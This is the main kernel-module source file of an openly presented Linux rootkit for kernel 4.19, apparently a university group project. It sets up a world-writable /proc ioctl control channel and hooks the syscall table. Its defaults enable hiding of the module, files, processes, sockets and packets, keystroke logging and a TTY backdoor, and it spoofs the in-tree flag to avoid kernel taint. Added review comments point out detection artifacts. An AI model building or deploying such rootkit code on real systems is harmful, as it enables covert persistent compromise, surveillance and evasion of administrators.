linux-rootkit

Feature-rich interactive rootkit that targets Linux kernel 4.19, accompanied by a dynamic kernel memory analysis GDB plugin for in vivo introspection (e.g. using QEMU)

g7.c (2722B)


      1 #include <linux/fs.h>
      2 #include <linux/init.h>
      3 #include <linux/kernel.h>
      4 #include <linux/module.h>
      5 #include <linux/mutex.h>
      6 #include <linux/proc_fs.h>
      7 #include <linux/uaccess.h>
      8 #include <linux/printk.h>
      9 
     10 #include "ioctl.h"
     11 #include "channel.h"
     12 #include "common.h"
     13 #include "rootkit.h"
     14 
     15 #define BUFLEN 4096
     16 
     17 
/* Module entry points, defined at the bottom of this file and registered via module_init()/module_exit(). */
static int  __init g7_init(void);
static void __exit g7_exit(void);

/*
 * file_operations callbacks for the /proc entry created in g7_init().
 * NOTE(review): the write prototype here takes `const char *`, while the
 * definition below uses `const char __user *`; only the sparse address-space
 * annotation differs, but sparse may warn about the mismatch, so the two
 * should be kept identical.
 */
static int     g7_fops_open(struct inode *, struct file *);
static int     g7_fops_release(struct inode *, struct file *);
static ssize_t g7_fops_read(struct file *, char __user *, size_t, loff_t *);
static ssize_t g7_fops_write(struct file *, const char *, size_t, loff_t *);
static long    g7_fops_ioctl(struct file *, unsigned, unsigned long);


/*
 * Taken in g7_fops_open() and released in g7_fops_release(): the mutex is
 * held for the whole lifetime of an open file descriptor, not per call.
 */
static struct mutex lock;
/*
 * Buffer passed to proc_create_data() as the entry's private data. Nothing
 * in this file reads it back, and the `buf` parameters of the read/write
 * callbacks below shadow this array (-Wshadow would flag it).
 */
static char buf[BUFLEN];
     30 
/*
 * Callback table for the /proc control entry. read and write are stubs
 * (see below); all control traffic goes through .unlocked_ioctl, so the
 * ioctl command numbers are the interface worth auditing.
 */
static struct file_operations g7_fops =
{
    .owner          = THIS_MODULE,
    .read           = g7_fops_read,
    .write          = g7_fops_write,
    .open           = g7_fops_open,
    .unlocked_ioctl = g7_fops_ioctl,
    .release        = g7_fops_release,
};
     40 
     41 
/*
 * Global feature configuration. rootkit_t is declared in rootkit.h (not in
 * this file); every flag is initialised to `true`, and the two non-boolean
 * fields (FH_LSTAR, BD_TTY) select modes whose meaning lives in that header.
 * Nothing in this file touches it after initialisation — presumably it is
 * read by the hook code in other translation units, which is also why it is
 * not `static`. Verify against those units before relying on the defaults.
 */
rootkit_t rootkit = {
    .hiding_module  = true,
    .hiding_files   = FH_LSTAR,
    .hiding_open    = true,
    .hiding_pids    = true,
    .hiding_sockets = true,
    .hiding_packets = true,
    .logging_input  = true,
    .backdoor = BD_TTY,
};
     52 
     53 
/*
 * open() on the /proc entry: acquires `lock` and keeps it until release().
 * A second open() from any task therefore blocks here until the first
 * descriptor is closed. NOTE(review): mutex_lock() rather than
 * mutex_lock_interruptible() is used, so a blocked opener cannot be
 * interrupted by a signal. The inode/file arguments are unused; the debug
 * line is emitted while the lock is already held.
 */
static int
g7_fops_open(struct inode *inode, struct file *file)
{
    mutex_lock(&lock);
    DEBUG_INFO("[g7_fops_open]\n");
    return 0;
}
     61 
/*
 * release() on the /proc entry: drops the mutex taken in g7_fops_open(),
 * after logging. Both arguments are unused.
 */
static int
g7_fops_release(struct inode *inode, struct file *file)
{
    DEBUG_INFO("[g7_fops_release]\n");
    mutex_unlock(&lock);
    return 0;
}
     69 
/*
 * read() stub: logs and returns 0 (end of file) without writing anything to
 * the user buffer. `buf` shadows the file-scope array of the same name;
 * `len` and `off` are unused.
 */
static ssize_t
g7_fops_read(struct file *file, char __user *buf, size_t len, loff_t *off)
{
    DEBUG_INFO("[g7_fops_read]\n");
    return 0;
}
     76 
/*
 * write() stub: logs and returns 0 without consuming any input. NOTE(review):
 * returning 0 rather than `len` (or an error) reports zero bytes consumed to
 * the caller. `buf` shadows the file-scope array; `len` and `off` are unused.
 */
static ssize_t
g7_fops_write(struct file *file, const char __user *buf, size_t len, loff_t *off)
{
    DEBUG_INFO("[g7_fops_write]\n");
    return 0;
}
     83 
/*
 * ioctl() dispatcher for the /proc entry. detect_channel() (channel.h) maps
 * the command number to a channel_t carrying a printable .name and an
 * optional .handler; a NULL handler yields -ENOTTY, the conventional
 * "not an ioctl for this file" error. Every call — including unknown
 * commands — is logged with the raw command number through DEBUG_NOTICE
 * (presumably a printk wrapper from one of the project headers), which makes
 * the kernel log of an affected machine a useful place to look.
 *
 * NOTE(review): `arg` is forwarded untouched; whether a handler treats it as
 * a value or as a __user pointer is decided in the handlers, not here.
 * `_file` is unused.
 */
static long
g7_fops_ioctl(struct file *_file, unsigned cmd, unsigned long arg)
{
    channel_t c = detect_channel(cmd);
    DEBUG_NOTICE("[g7_fops_ioctl] on %#10x (%s)\n", cmd, c.name);

    if (c.handler)
        return c.handler(arg);
    else
        return -ENOTTY;
}
     95 
     96 
/*
 * Module initialisation. Observable effects, in order:
 *  - creates /proc/<G7_DEVICE> (name from a project header) with mode 0777,
 *    i.e. readable and writable by every user — an unusual mode for a proc
 *    file and an easily auditable artifact;
 *  - installs the hooks via init_hooks() once retrieve_sys_call_table()
 *    has succeeded;
 *  - logs the proc path through DEBUG_INFO and calls report_channels().
 *
 * NOTE(review): proc_create_data()'s return value is not checked, and on the
 * retrieve_sys_call_table() failure path the proc entry is left registered
 * while the load fails with a bare -1 rather than a -E* value. `buf` is
 * registered as the entry's private data, but no callback in this file reads
 * it back.
 */
static int
g7_init(void)
{
    mutex_init(&lock);
    proc_create_data(G7_DEVICE, 0777, NULL, &g7_fops, buf);

    if (retrieve_sys_call_table())
        return -1;

    init_hooks();
    DEBUG_INFO("[g7_init] at /proc/%s\n", G7_DEVICE);
    report_channels();

    return 0;
}
    112 
/*
 * Module teardown: removes the /proc entry first, then undoes the hooks via
 * remove_hooks(). The literal `0` is the parent pointer, matching the NULL
 * parent given to proc_create_data() in g7_init(); NULL would be the clearer
 * spelling.
 */
static void
g7_exit(void)
{
    remove_proc_entry(G7_DEVICE, 0);
    remove_hooks();
    DEBUG_INFO("[g7_exit]\n");
}
    120 
    121 
/* License tag; GPL-only exported kernel symbols are available only to modules declaring a GPL-compatible license. */
MODULE_LICENSE("GPL");
MODULE_AUTHOR("Group 7");
MODULE_DESCRIPTION("Rootkit Programming");
/*
 * NOTE(review): "intree" is the modinfo field the kernel uses to tell in-tree
 * modules from out-of-tree ones; presumably set here so that loading does not
 * raise the usual out-of-tree taint. For anyone auditing a box, this means
 * taint flags alone are not a reliable signal — compare `modinfo` output for
 * a suspect .ko against the kernel's own build.
 */
MODULE_INFO(intree, "Y");

module_init(g7_init);
module_exit(g7_exit);